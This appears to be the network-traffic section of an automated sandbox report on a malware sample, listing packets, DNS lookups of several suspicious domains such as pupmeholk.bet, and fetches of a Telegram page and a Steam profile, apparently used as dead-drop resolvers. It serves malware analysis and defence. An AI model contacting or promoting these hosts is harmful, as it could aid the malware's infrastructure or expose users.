                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:28.825668097 CET49739443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:28.825684071 CET4434973923.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:28.825691938 CET4434973923.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:28.829529047 CET49740443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:28.829571962 CET4434974023.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:28.829653025 CET49740443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:28.829936028 CET49740443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:28.829947948 CET4434974023.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:29.446736097 CET4434974023.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:29.446822882 CET49740443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:29.448672056 CET49740443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:29.448684931 CET4434974023.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:29.449846983 CET4434974023.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:29.451066017 CET49740443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:29.496320009 CET4434974023.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:29.896970034 CET4434974023.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:29.896998882 CET4434974023.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:29.897015095 CET4434974023.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:29.897028923 CET49740443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:29.897058964 CET4434974023.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:29.897089005 CET49740443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:29.897118092 CET49740443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:29.982796907 CET4434974023.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:29.982840061 CET4434974023.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:29.982871056 CET49740443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:29.982897997 CET4434974023.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:29.982933998 CET49740443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:29.984246969 CET4434974023.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:29.984303951 CET49740443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:29.984316111 CET4434974023.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:29.984328032 CET4434974023.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:29.984357119 CET49740443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:29.984432936 CET49740443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:29.984441996 CET4434974023.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:29.984453917 CET49740443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:29.984458923 CET4434974023.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:30.068047047 CET49742443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:30.068082094 CET4434974223.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:30.068269968 CET49742443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:30.068825006 CET49742443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:30.068839073 CET4434974223.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:30.711978912 CET4434974223.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:30.712228060 CET49742443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:30.713485956 CET49742443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:30.713493109 CET4434974223.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:30.713761091 CET4434974223.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:30.715038061 CET49742443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:30.760324955 CET4434974223.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.184827089 CET4434974223.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.184856892 CET4434974223.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.184876919 CET4434974223.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.184916019 CET49742443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.184933901 CET4434974223.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.184967041 CET49742443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.184999943 CET49742443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.270817995 CET4434974223.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.270885944 CET4434974223.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.270925045 CET49742443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.270946026 CET4434974223.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.271109104 CET4434974223.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.271193981 CET4434974223.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.271219015 CET49742443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.271323919 CET49742443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.271323919 CET49742443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.272499084 CET49742443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.272514105 CET4434974223.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.281085968 CET49743443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.281132936 CET4434974323.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.281538010 CET49743443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.281538010 CET49743443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.281569004 CET4434974323.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.901470900 CET4434974323.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.901979923 CET49743443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.914307117 CET49743443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.914346933 CET4434974323.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.914629936 CET4434974323.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.919759989 CET49743443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.964333057 CET4434974323.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:32.380858898 CET4434974323.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:32.380886078 CET4434974323.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:32.380903006 CET4434974323.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:32.380942106 CET49743443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:32.380969048 CET4434974323.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:32.381015062 CET49743443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:32.381057024 CET49743443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:32.460237026 CET4434974323.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:32.460288048 CET4434974323.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:32.460311890 CET4434974323.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:32.460323095 CET49743443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:32.460340023 CET4434974323.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:32.460372925 CET49743443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:32.460414886 CET4434974323.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:32.460469961 CET49743443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:32.460659981 CET49743443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:32.460671902 CET4434974323.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:32.460686922 CET49743443192.168.2.423.192.247.89
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:32.460691929 CET4434974323.192.247.89192.168.2.4
                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:12.144258976 CET5902953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:12.151279926 CET53590291.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.192008972 CET6344653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.201704025 CET53634461.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.202944994 CET5088553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.339442968 CET53508851.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.341660976 CET5719553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.350470066 CET53571951.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.353219032 CET5162553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.521903992 CET53516251.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.530400991 CET5798353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.539087057 CET53579831.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.540247917 CET5462753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.549635887 CET53546271.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.550790071 CET5642453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.559098959 CET53564241.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.560064077 CET6534453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.568753958 CET53653441.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.571289062 CET6065653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.578329086 CET53606561.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:14.869499922 CET5362753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:14.879545927 CET53536271.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:27.654531002 CET5232253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:27.661022902 CET53523221.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.272890091 CET5315153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.280471087 CET53531511.1.1.1192.168.2.4

                                                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:12.144258976 CET192.168.2.41.1.1.10x45dStandard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.192008972 CET192.168.2.41.1.1.10xf6c6Standard query (0)crosshairc.lifeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.202944994 CET192.168.2.41.1.1.10x248Standard query (0)mrodularmall.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.341660976 CET192.168.2.41.1.1.10x967bStandard query (0)jowinjoinery.icuA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.353219032 CET192.168.2.41.1.1.10x3951Standard query (0)legenassedk.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.530400991 CET192.168.2.41.1.1.10xb0aStandard query (0)htardwarehu.icuA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.540247917 CET192.168.2.41.1.1.10x57bdStandard query (0)cjlaspcorne.icuA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.550790071 CET192.168.2.41.1.1.10x7310Standard query (0)bugildbett.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.560064077 CET192.168.2.41.1.1.10x80c2Standard query (0)weaponrywo.digitalA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.571289062 CET192.168.2.41.1.1.10xfe8bStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:14.869499922 CET192.168.2.41.1.1.10x4ea8Standard query (0)pupmeholk.betA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:27.654531002 CET192.168.2.41.1.1.10xf3eaStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.272890091 CET192.168.2.41.1.1.10x90feStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:12.151279926 CET1.1.1.1192.168.2.40x45dNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.201704025 CET1.1.1.1192.168.2.40xf6c6Name error (3)crosshairc.lifenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.339442968 CET1.1.1.1192.168.2.40x248Name error (3)mrodularmall.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.350470066 CET1.1.1.1192.168.2.40x967bName error (3)jowinjoinery.icunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.521903992 CET1.1.1.1192.168.2.40x3951Name error (3)legenassedk.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.539087057 CET1.1.1.1192.168.2.40xb0aName error (3)htardwarehu.icunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.549635887 CET1.1.1.1192.168.2.40x57bdName error (3)cjlaspcorne.icunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.559098959 CET1.1.1.1192.168.2.40x7310Name error (3)bugildbett.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.568753958 CET1.1.1.1192.168.2.40x80c2Name error (3)weaponrywo.digitalnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:13.578329086 CET1.1.1.1192.168.2.40xfe8bNo error (0)steamcommunity.com104.73.234.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:14.879545927 CET1.1.1.1192.168.2.40x4ea8No error (0)pupmeholk.bet104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:14.879545927 CET1.1.1.1192.168.2.40x4ea8No error (0)pupmeholk.bet104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:14.879545927 CET1.1.1.1192.168.2.40x4ea8No error (0)pupmeholk.bet104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:14.879545927 CET1.1.1.1192.168.2.40x4ea8No error (0)pupmeholk.bet104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:14.879545927 CET1.1.1.1192.168.2.40x4ea8No error (0)pupmeholk.bet104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:14.879545927 CET1.1.1.1192.168.2.40x4ea8No error (0)pupmeholk.bet104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:14.879545927 CET1.1.1.1192.168.2.40x4ea8No error (0)pupmeholk.bet104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:27.661022902 CET1.1.1.1192.168.2.40xf3eaNo error (0)steamcommunity.com23.192.247.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Mar 17, 2025 01:04:31.280471087 CET1.1.1.1192.168.2.40x90feNo error (0)steamcommunity.com23.192.247.89A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                                                                  • t.me
                                                                                                                                                                                                                                                  • steamcommunity.com
                                                                                                                                                                                                                                                  • pupmeholk.bet

                                                                                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  0192.168.2.449722149.154.167.994437384C:\Users\user\Desktop\12Kp1xbcjv.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-03-17 00:04:12 UTC65OUTGET /farmercommu HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Host: t.me
                                                                                                                                                                                                                                                  2025-03-17 00:04:13 UTC511INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                                                                                                                                  Date: Mon, 17 Mar 2025 00:04:13 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 12377
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: stel_ssid=874474847aaa395d08_6395038482500837556; expires=Tue, 18 Mar 2025 00:04:13 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Cache-control: no-store
                                                                                                                                                                                                                                                  X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                  Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                  2025-03-17 00:04:13 UTC12377INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 66 61 72 6d 65 72 63 6f 6d 6d 75 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @farmercommu</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.p


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  1192.168.2.449723104.73.234.1024437384C:\Users\user\Desktop\12Kp1xbcjv.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-03-17 00:04:14 UTC94OUTGET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Host: steamcommunity.com
                                                                                                                                                                                                                                                  2025-03-17 00:04:14 UTC1974INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Date: Mon, 17 Mar 2025 00:04:14 GMT
                                                                                                                                                                                                                                                  Content-Length: 36132
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: sessionid=efe798678573e2f05adb7e8a; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                  Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                  2025-03-17 00:04:14 UTC14410INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
                                                                                                                                                                                                                                                  2025-03-17 00:04:14 UTC16384INData Raw: 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 73 74 61 74 73 2f 22 3e 0a 09 09 09 09 09 09 53 74 61 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 73 75 70 65 72 6e 61 76 20 73 75 70 65 72 6e 61 76 5f 61 63 74 69 76 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 22 20 64 61 74 61 2d 74 6f 6f 6c 74 69 70 2d 74 79 70 65 3d 22 73 65 6c 65 63 74 6f 72 22
                                                                                                                                                                                                                                                  Data Ascii: </a><a class="submenuitem" href="https://store.steampowered.com/stats/">Stats</a></div><a class="menuitem supernav supernav_active" href="https://steamcommunity.com/" data-tooltip-type="selector"
                                                                                                                                                                                                                                                  2025-03-17 00:04:14 UTC3762INData Raw: 09 09 09 09 09 09 3c 64 69 76 20 69 64 3d 22 4e 61 6d 65 50 6f 70 75 70 41 6c 69 61 73 65 73 22 3e 0a 0a 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 20 69 64 3d 22 4e 61 6d 65 50 6f 70 75 70 43 6c 65 61 72 41 6c 69 61 73 65 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6c 65 61 72 3a 62 6f 74 68 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 5f 72 65 61 6c 5f 6e 61 6d 65 20 65
                                                                                                                                                                                                                                                  Data Ascii: <div id="NamePopupAliases"></div><div style="display:none" id="NamePopupClearAliases"></div><div style="clear:both"></div></div></div></div><div class="header_real_name e
